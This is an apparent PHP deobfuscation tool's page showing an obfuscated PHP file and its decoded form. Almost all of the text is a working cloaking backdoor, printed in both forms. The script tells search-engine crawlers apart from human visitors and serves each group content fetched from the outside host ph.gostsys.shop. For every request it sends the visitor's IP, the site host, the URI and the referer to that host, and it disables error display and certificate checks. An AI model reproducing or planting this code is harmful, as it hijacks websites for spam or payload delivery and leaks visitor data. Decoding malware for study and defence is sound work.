Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php function i(){$u=sTrToLoWeR($_SERVER["\110\124\124\120_\125\123\105\122_\101\107\105\..

Decoded Output download

<?php function i(){$u=sTrToLoWeR($_SERVER["HTTP_USER_AGENT"]);if(PrEg_mAtCh("#bot|spider|crawl|nutch|lycos|robozilla|slurp|search|seek|archive#i",$u)){return true;}$k=array("Googlebot"=>"Google","Google-InspectionTool"=>"","yahoo"=>"","Exabot"=>"Exabot","MSNBot"=>"bing","ia_archiver"=>"Alexa","sqworm"=>"AOL","yodaoBot"=>"","Googlebot-Image"=>"","Scooter"=>"Altavista","Lycos_Spider"=>"Lycos","FAST-WebCrawler"=>"Alltheweb","Slurp"=>"INKTOMI","Gigabot"=>"gigablast.com","BSpider"=>"",);foreach($k as $n=>$c){if(sTrIpOS($u,sTrToLoWeR($n))>-1){return true;}}return false;}if(i()==false){$ch=CuRl_IniT();CuRl_sEtOpT($ch,CURLOPT_URL,"http://ph.gostsys.shop/503.php");CuRl_sEtOpT($ch,CURLOPT_SSL_VERIFYPEER,FALSE);CuRl_sEtOpT($ch,CURLOPT_SSL_VERIFYHOST,FALSE);CuRl_sEtOpT($ch,CURLOPT_RETURNTRANSFER,1);$ot=CuRl_eXeC($ch);CuRl_cLosE($ch);echo$ot;exit;}oB_sTaRt();sEt_TiMe_lImiT(3600);iNi_sEt("display_errors","Off");iNi_sEt("allow_url_fopen","On");iGnOre_uSer_aBoRt(1);function gP(){$s=array("HTTP_CF_CONNECTING_IP","HTTP_X_FORWARDED_FOR","HTTP_FORWARDED_FOR","HTTP_X_FORWARDED","HTTP_FORWARDED","HTTP_X_CLUSTER_CLIENT_IP","REMOTE_ADDR","HTTP_CLIENT_IP");foreach($s as $e){if(iSsEt($_SERVER[$e])&&fIltEr_vAr($_SERVER[$e],FILTER_VALIDATE_IP)){return $_SERVER[$e];}}return "0.0.0.0";}function fR($r,$a,$b){if(fUnCtioN_eXisTs("CuRl_IniT")){return fC($r,$a,$b);}else{return f($r,$a,$b);}}function fC($r,$a,$b){$L=CuRl_IniT();CuRl_sEtOpT($L,CURLOPT_URL,$r);CuRl_sEtOpT($L,CURLOPT_HEADER,0);CuRl_sEtOpT($L,CURLOPT_TIMEOUT,30);CuRl_sEtOpT($L,CURLOPT_RETURNTRANSFER,1);CuRl_sEtOpT($L,CURLOPT_USERAGENT,$a);CuRl_sEtOpT($L,CURLOPT_REFERER,$b);CuRl_sEtOpT($L,CURLOPT_SSL_VERIFYPEER,FALSE);CuRl_sEtOpT($L,CURLOPT_SSL_VERIFYHOST,FALSE);$rp=CuRl_eXeC($L);$hc=cURl_gEtiNfO($L,CURLINFO_HTTP_CODE);CuRl_cLosE($L);return array("code"=>$hc,"body"=>$rp);}function f($r,$a,$b){$o=array("http"=>array("method"=>"GET","header"=>"User-Agent:$a
"."Referer:$b
","timeout"=>30,"ignore_errors"=>true),"ssl"=>array("verify_peer"=>false,"verify_peer_name"=>false,));$nx=stReAm_CoNteXt_cReaTe($o);$bd=@fIlE_gEt_cOnTeNts($r,false,$nx);$cd=null;if(iSsEt($rhd)&&is_array($rhd)){foreach($rhd as $d){if(stRpOs($d,"HTTP/")===0){$pt=eXpLoDe("",$d);if(coUNt($pt)>1){$cd=iNtVal($pt[1]);}break;}}}return array("code"=>$cd,"body"=>$bd);}$a=iSsEt($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:"null";$b=iSsEt($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:"null";$cp=gP();$rs="http://ph.gostsys.shop/";$qs=iSsEt($_GET["id"])?$_GET["id"]:(iSsEt($_GET["ID"])?$_GET["ID"]:"");$dd=iSsEt($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:(iSsEt($_SERVER["HTTP_X_FORWARDED_HOST"])?$_SERVER["HTTP_X_FORWARDED_HOST"]:"");$fL=iSsEt($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:(iSsEt($_SERVER["HTTP_X_REWRITE_URL"])?$_SERVER["HTTP_X_REWRITE_URL"]:"");try{$rU=$rs."?".hTTp_bUIld_qUeRy(array("id"=>uRlEnCoDe($qs),"ip"=>$cp,"file"=>uRlEnCoDe($fL),"host"=>uRlEnCoDe($dd),"referer"=>uRlEnCoDe($b)));$rp=fR($rU,$a,$b);if($rp["code"]==404){hEAdEr("HTTP/1.0404NotFound");}echo$rp["body"];exit;}catch(Exception$ex){}oB_eNd_fLUsh();?>

Did this file decode correctly?

Original Code

<?php function i(){$u=sTrToLoWeR($_SERVER["\110\124\124\120_\125\123\105\122_\101\107\105\116\124"]);if(PrEg_mAtCh("#\142\157\164|\163\160\151\144\145\162|\143\162\141\167\154|\156\165\164\143\150|\154\171\143\157\163|\162\157\142\157\172\151\154\154\141|\163\154\165\162\160|\163\145\141\162\143\150|\163\145\145\153|\141\162\143\150\151\166\145#\151",$u)){return true;}$k=array("\107\157\157\147\154\145\142\157\164"=>"\107\157\157\147\154\145","\107\157\157\147\154\145-\111\156\163\160\145\143\164\151\157\156\124\157\157\154"=>"","\171\141\150\157\157"=>"","\105\170\141\142\157\164"=>"\105\170\141\142\157\164","\115\123\116\102\157\164"=>"bing","\151\141_\141\162\143\150\151\166\145\162"=>"\101\154\145\170\141","\163\161\167\157\162\155"=>"AOL","\171\157\144\141\157\102\157\164"=>"","\107\157\157\147\154\145\142\157\164-Image"=>"","\123\143\157\157\164\145\162"=>"\101\154\164\141\166\151\163\164\141","\114\171\143\157\163_\123\160\151\144\145\162"=>"\114\171\143\157\163","\106\101\123\124-\127\145\142\103\162\141\167\154\145\162"=>"\101\154\154\164\150\145\167\145\142","\123\154\165\162\160"=>"\111\116\113\124\117\115\111","\107\151\147\141\142\157\164"=>"\147\151\147\141\142\154\141\163\164.\143\157\155","\102\123\160\151\144\145\162"=>"",);foreach($k as $n=>$c){if(sTrIpOS($u,sTrToLoWeR($n))>-1){return true;}}return false;}if(i()==false){$ch=CuRl_IniT();CuRl_sEtOpT($ch,CURLOPT_URL,"\150\164\164\160://\160\150.\147\157\163\164\163\171\163.\163\150\157\160/503.\160\150\160");CuRl_sEtOpT($ch,CURLOPT_SSL_VERIFYPEER,FALSE);CuRl_sEtOpT($ch,CURLOPT_SSL_VERIFYHOST,FALSE);CuRl_sEtOpT($ch,CURLOPT_RETURNTRANSFER,1);$ot=CuRl_eXeC($ch);CuRl_cLosE($ch);echo$ot;exit;}oB_sTaRt();sEt_TiMe_lImiT(3600);iNi_sEt("\144\151\163\160\154\141\171_\145\162\162\157\162\163","\117\146\146");iNi_sEt("\141\154\154\157\167_\165\162\154_\146\157\160\145\156","\117\156");iGnOre_uSer_aBoRt(1);function gP(){$s=array("\110\124\124\120_\103\106_\103\117\116\116\105\103\124\111\116\107_\111\120","\110\124\124\120_\130_\106\117\122\127\101\122\104\105\104_\106\117\122","\110\124\124\120_\106\117\122\127\101\122\104\105\104_\106\117\122","\110\124\124\120_\130_\106\117\122\127\101\122\104\105\104","\110\124\124\120_\106\117\122\127\101\122\104\105\104","\110\124\124\120_\130_\103\114\125\123\124\105\122_\103\114\111\105\116\124_\111\120","\122\105\115\117\124\105_\101\104\104\122","\110\124\124\120_\103\114\111\105\116\124_\111\120");foreach($s as $e){if(iSsEt($_SERVER[$e])&&fIltEr_vAr($_SERVER[$e],FILTER_VALIDATE_IP)){return $_SERVER[$e];}}return "0.0.0.0";}function fR($r,$a,$b){if(fUnCtioN_eXisTs("CuRl_IniT")){return fC($r,$a,$b);}else{return f($r,$a,$b);}}function fC($r,$a,$b){$L=CuRl_IniT();CuRl_sEtOpT($L,CURLOPT_URL,$r);CuRl_sEtOpT($L,CURLOPT_HEADER,0);CuRl_sEtOpT($L,CURLOPT_TIMEOUT,30);CuRl_sEtOpT($L,CURLOPT_RETURNTRANSFER,1);CuRl_sEtOpT($L,CURLOPT_USERAGENT,$a);CuRl_sEtOpT($L,CURLOPT_REFERER,$b);CuRl_sEtOpT($L,CURLOPT_SSL_VERIFYPEER,FALSE);CuRl_sEtOpT($L,CURLOPT_SSL_VERIFYHOST,FALSE);$rp=CuRl_eXeC($L);$hc=cURl_gEtiNfO($L,CURLINFO_HTTP_CODE);CuRl_cLosE($L);return array("\143\157\144\145"=>$hc,"\142\157\144\171"=>$rp);}function f($r,$a,$b){$o=array("http"=>array("method"=>"GET","header"=>"User-Agent:$a\r\n"."Referer:$b\r\n","timeout"=>30,"ignore_errors"=>true),"ssl"=>array("verify_peer"=>false,"verify_peer_name"=>false,));$nx=stReAm_CoNteXt_cReaTe($o);$bd=@fIlE_gEt_cOnTeNts($r,false,$nx);$cd=null;if(iSsEt($rhd)&&is_array($rhd)){foreach($rhd as $d){if(stRpOs($d,"HTTP/")===0){$pt=eXpLoDe("",$d);if(coUNt($pt)>1){$cd=iNtVal($pt[1]);}break;}}}return array("\143\157\144\145"=>$cd,"\142\157\144\171"=>$bd);}$a=iSsEt($_SERVER["\110\124\124\120_\125\123\105\122_\101\107\105\116\124"])?$_SERVER["\110\124\124\120_\125\123\105\122_\101\107\105\116\124"]:"null";$b=iSsEt($_SERVER["\110\124\124\120_\122\105\106\105\122\105\122"])?$_SERVER["\110\124\124\120_\122\105\106\105\122\105\122"]:"null";$cp=gP();$rs="\150\164\164\160://\160\150.\147\157\163\164\163\171\163.\163\150\157\160/";$qs=iSsEt($_GET["id"])?$_GET["id"]:(iSsEt($_GET["ID"])?$_GET["ID"]:"");$dd=iSsEt($_SERVER["\110\124\124\120_\110\117\123\124"])?$_SERVER["\110\124\124\120_\110\117\123\124"]:(iSsEt($_SERVER["\110\124\124\120_\130_\106\117\122\127\101\122\104\105\104_\110\117\123\124"])?$_SERVER["\110\124\124\120_\130_\106\117\122\127\101\122\104\105\104_\110\117\123\124"]:"");$fL=iSsEt($_SERVER["\122\105\121\125\105\123\124_\125\122\111"])?$_SERVER["\122\105\121\125\105\123\124_\125\122\111"]:(iSsEt($_SERVER["\110\124\124\120_\130_\122\105\127\122\111\124\105_\125\122\114"])?$_SERVER["\110\124\124\120_\130_\122\105\127\122\111\124\105_\125\122\114"]:"");try{$rU=$rs."?".hTTp_bUIld_qUeRy(array("id"=>uRlEnCoDe($qs),"ip"=>$cp,"file"=>uRlEnCoDe($fL),"host"=>uRlEnCoDe($dd),"referer"=>uRlEnCoDe($b)));$rp=fR($rU,$a,$b);if($rp["code"]==404){hEAdEr("HTTP/1.0404NotFound");}echo$rp["body"];exit;}catch(Exception$ex){}oB_eNd_fLUsh();?>

Function Calls

i 1
sTrToLoWeR 1

Variables

None

Stats

MD5 bad45b5bd7f8f0fd6162d541b1dde049
Eval Count 0
Decode Time 89 ms